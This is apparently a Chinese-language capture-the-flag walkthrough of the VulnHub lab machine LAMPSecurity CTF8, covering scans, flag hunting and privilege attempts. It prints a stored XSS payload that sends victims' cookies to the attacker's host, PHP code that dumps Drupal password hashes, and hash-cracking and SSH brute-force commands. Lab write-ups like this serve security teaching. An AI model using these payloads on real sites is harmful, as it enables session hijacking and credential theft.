­

Hack the LAMPSecurity: CTF8 (CTF Challenge)

  • 2019 年 10 月 6 日
  • 筆記

欢迎来到boot2root CTF挑战“LAMPSecurity:CTF8”由madirsh2600上传到vulnhub。因为,有一个主题,你需要获取flag以完成挑战,下载地址。

https://www.vulnhub.com/entry/lampsecurity-ctf8,87/

根据作者描述,该漏洞靶机环境有很多种技术可以获得root权限。但这中间并没有利用开发/缓冲区溢出。因此,根据我们的经验和知识,即可渗透并获取相关flag值。

使用级别: 初学者

渗透方法:

  • 网络扫描(Nmap)
  • 浏览HTTP Web服务
  • Web漏洞分析(Nikto)
  • 目录扫描(Dirb)
  • Burpsuite捕获和修改请求
  • 破解密码哈希(John – The Ripper)
  • SSH暴力(medusa)
  • 在不同阶段搜索并捕获flag

渗透过程

使用IPscan扫描一下ip段

浏览器访问

nmap扫描一下 

C:Userssec>nmap -A 172.16.1.186  Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-29 20:01 ?D1ú±ê×?ê±??  Nmap scan report for 172.16.1.186  Host is up (0.00031s latency).  Not shown: 981 closed ports  PORT     STATE SERVICE     VERSION  21/tcp   open  ftp         vsftpd 2.0.5  | ftp-anon: Anonymous FTP login allowed (FTP code 230)  |_drwxr-xr-x    2 0        0            4096 Jun 05  2013 pub  | ftp-syst:  |   STAT:  | FTP server status:  |      Connected to 172.16.1.1  |      Logged in as ftp  |      TYPE: ASCII  |      No session bandwidth limit  |      Session timeout in seconds is 300  |      Control connection is plain text  |      Data connections will be plain text  |      At session startup, client count was 2  |      vsFTPd 2.0.5 - secure, fast, stable  |_End of status  22/tcp   open  ssh         OpenSSH 4.3 (protocol 2.0)  | ssh-hostkey:  |   1024 5e:ca:64:f0:7f:d2:1a:a2:86:c6:1f:c2:2a:b3:6b:27 (DSA)  |_  2048 a3:39:2d:9f:66:96:0d:82:ad:52:1f:a1:dc:b1:f1:54 (RSA)  25/tcp   open  smtp        Sendmail  | smtp-commands: localhost.localdomain Hello [172.16.1.1], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,  |_ 2.0.0 This is sendmail 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info  80/tcp   open  http        Apache httpd 2.2.3 ((CentOS))  |_http-favicon: Drupal CMS  | http-git:  |   172.16.1.186:80/.git/  |     Git repository found!  |     Repository description: Unnamed repository; edit this file 'description' to name the...  |_    Last commit message: initial commit  | http-robots.txt: 36 disallowed entries (15 shown)  | /includes/ /misc/ /modules/ /profiles/ /scripts/  | /sites/ /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt  | /INSTALL.pgsql.txt /install.php /INSTALL.txt /LICENSE.txt  |_/MAINTAINERS.txt  |_http-server-header: Apache/2.2.3 (CentOS)  |_http-title: LAMPSecurity Research  111/tcp  open  rpcbind     2 (RPC #100000)  | rpcinfo:  |   program version   port/proto  service  |   100000  2            111/tcp  rpcbind  |   100000  2            111/udp  rpcbind  |   100024  1            943/udp  status  |_  100024  1            946/tcp  status  139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)  443/tcp  open  ssl/http    Apache httpd 2.2.3 ((CentOS))  | http-robots.txt: 36 disallowed entries (15 shown)  | /includes/ /misc/ /modules/ /profiles/ /scripts/  | /sites/ /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt  | /INSTALL.pgsql.txt /install.php /INSTALL.txt /LICENSE.txt  |_/MAINTAINERS.txt  |_http-title: LAMPSecurity Research  | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--  | Not valid before: 2013-05-29T19:38:35  |_Not valid after:  2014-05-29T19:38:35  |_ssl-date: 2019-07-29T20:02:17+00:00; +8h00m01s from scanner time.  445/tcp  open  netbios-ssn Samba smbd 3.0.33-3.7.el5 (workgroup: WORKGROUP)  3306/tcp open  mysql       MySQL (unauthorized)  5801/tcp open  vnc-http    RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5901)  |_http-server-header: RealVNC/4.0  |_http-title: VNC viewer for Java  5802/tcp open  vnc-http    RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5902)  |_http-server-header: RealVNC/4.0  |_http-title: VNC viewer for Java  5901/tcp open  vnc         VNC (protocol 3.8)  | vnc-info:  |   Protocol version: 3.8  |   Security types:  |_    VNC Authentication (2)  5902/tcp open  vnc         VNC (protocol 3.8)  | vnc-info:  |   Protocol version: 3.8  |   Security types:  |_    VNC Authentication (2)  5903/tcp open  vnc         VNC (protocol 3.8)  | vnc-info:  |   Protocol version: 3.8  |   Security types:  |_    VNC Authentication (2)  5904/tcp open  vnc         VNC (protocol 3.8)  | vnc-info:  |   Protocol version: 3.8  |   Security types:  |_    VNC Authentication (2)  6001/tcp open  X11         (access denied)  6002/tcp open  X11         (access denied)  6003/tcp open  X11         (access denied)  6004/tcp open  X11         (access denied)  MAC Address: 00:0C:29:81:12:AD (VMware)  Device type: general purpose  Running: Linux 2.6.X  OS CPE: cpe:/o:linux:linux_kernel:2.6  OS details: Linux 2.6.9 - 2.6.30  Network Distance: 1 hop  Service Info: OS: Unix    Host script results:  |_clock-skew: mean: 9h20m01s, deviation: 2h18m34s, median: 8h00m00s  |_nbstat: NetBIOS name: LAMPSEC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)  | smb-os-discovery:  |   OS: Unix (Samba 3.0.33-3.7.el5)  |   Computer name: localhost  |   NetBIOS computer name:  |   Domain name: localdomain  |   FQDN: localhost.localdomain  |_  System time: 2019-07-29T16:02:15-04:00  | smb-security-mode:  |   account_used: <blank>  |   authentication_level: user  |   challenge_response: supported  |_  message_signing: disabled (dangerous, but default)  |_smb2-time: Protocol negotiation failed (SMB2)    TRACEROUTE  HOP RTT     ADDRESS  1   0.31 ms 172.16.1.186    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  Nmap done: 1 IP address (1 host up) scanned in 76.65 seconds

查看网站源代码,发现第一个flag值

扫描网站目录 

root@kali:~# nikto -h 172.16.1.186  - Nikto v2.1.6  ---------------------------------------------------------------------------  + Target IP:          172.16.1.186  + Target Hostname:    172.16.1.186  + Target Port:        80  + Start Time:         2019-07-29 20:18:16 (GMT8)  ---------------------------------------------------------------------------  + Server: Apache/2.2.3 (CentOS)  + Cookie SESS1d48c63c4f4e7260fdc3973026dc5729 created without the httponly flag  + Retrieved x-powered-by header: PHP/5.1.6  + The anti-clickjacking X-Frame-Options header is not present.  + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS  + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type  + OSVDB-3268: /scripts/: Directory indexing found.  + Server leaks inodes via ETags, header found with file /robots.txt, inode: 1386098, size: 1629, mtime: Sun Mar 10 05:45:36 2030  + OSVDB-3268: /includes/: Directory indexing found.  + Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + OSVDB-3268: /misc/: Directory indexing found.  + Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + OSVDB-3268: /modules/: Directory indexing found.  + Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + OSVDB-3268: /profiles/: Directory indexing found.  + Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + OSVDB-3268: /sites/: Directory indexing found.  + Entry '/sites/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + OSVDB-3268: /themes/: Directory indexing found.  + Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/cron.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/update.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)  + Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/contact/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/search/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/?q=contact/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/?q=search/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)  + "robots.txt" contains 36 entries which should be manually viewed.  + Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.  + OSVDB-39272: favicon.ico file identifies this server as: Drupal 5.1.0  + Web Server returns a valid response with junk HTTP methods, this may cause false positives.  + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.  + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST    + /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.  + OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html  + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.  + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.  + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.  + OSVDB-3092: /includes/: This might be interesting...  + OSVDB-3092: /marketing/: This might be interesting...  + OSVDB-3092: /misc/: This might be interesting...

访问phpinfo.php文件找到第二个flag值

查看robots.txt文件找到第三个flag值

访问主页上的文章,发现新的目录content目录,这个目录在nikto的扫描结果中并不存在,所以我们使用dirb强制扫描一下

root@kali:~# dirb http://172.16.1.186/content    -----------------  DIRB v2.22  By The Dark Raver  -----------------    START_TIME: Mon Jul 29 20:31:16 2019  URL_BASE: http://172.16.1.186/content/  WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt    -----------------    GENERATED WORDS: 4612    ---- Scanning URL: http://172.16.1.186/content/ ----  + http://172.16.1.186/content/about (CODE:200|SIZE:6668)  + http://172.16.1.186/content/About (CODE:200|SIZE:6668)  --> Testing: http://172.16.1.186/content/createaccount  + http://172.16.1.186/content/hidden (CODE:200|SIZE:5966)  + http://172.16.1.186/content/marketing (CODE:403|SIZE:5520)

结果中有一个个hidden文件存在,访问一下:

得到第四个flag值。

访问用户页面,注册一个账户test/test,在首页的文章中发表评论,输入xss测试代码

现在让我们编辑我们的脚本以获取访问该页面的任何人的会话ID。我们想要捕获作为本文作者的Barbara的session_id。要获取会话ID,我们将强制它向包含我们的IP地址(kali)及其cookie值的URL发送请求,这样当任何人访问此页面时,它将在我们的服务器上查找名称的页面并将整个URL列为无法访问的URL。该脚本看起来像这样

<script>  var request=new XMLHttpRequest();  var redirect_url=”http://172.16.1.180/”+document.cookie;  request.open(“GET”,redirect_url);  request.send();  </script>

保存提交:

然后对帖子的作者进行留言

查看kali的web服务

python -m SimpleHTTPServer 8080

找cookie值,访问首页,bp抓包,带入cookie值:

跳转成功Barbara用户,发现可以添加更新,之中有php代码

<?php  $result = db_query(‘select name,pass from users’);  while($record = db_fetch_object($result))  {  print $record->name . “:” . $record->pass . “<br/>”;  }  ?>

点击save提交,最好使用burpsuite抓包查看,得到用户信息

要是不成功的话,记得替换cookie的值位管理员的cookie即可。

将上述用户信息保存到本地文档,使用john破解

破解命令

john -w=rockyou.txt -form=raw-md5 hash.txt

然后使用得到的账户信息破解系统的ssh服务 

medusa -h 172.16.1.186 -U user.txt -P pass.txt -M ssh

等待了好久,不成功。再次查看用户密码文件,发现没有首页官网第二篇文章的用户信息:

添加该用户信息到用户好密码文件,再次尝试爆破,得到账户密码有3对

[DATA] attacking service ssh on port 22    [22][ssh] host: 172.16.1.186  login: jharraway   password: letmein!  [22][ssh] host: 172.16.1.186  login: spinkton   password: football123  [22][ssh] host: 172.16.1.186   login: bdio   password: passw0rd  [STATUS] 167.00 tries/min, 167 tries in 00:01h, 53 todo in 00:01h, 5 active

以第一个身份登录发现第五个flag值

无法切换到root身份

以第二个身份spinkton 登录,发现第六个flag值

查看passwd文件发现最后一个flag文件

参考链接:

https://www.vulnhub.com/entry/lampsecurity-ctf8,87/

VirMach 便宜 VPS

QNews

QNews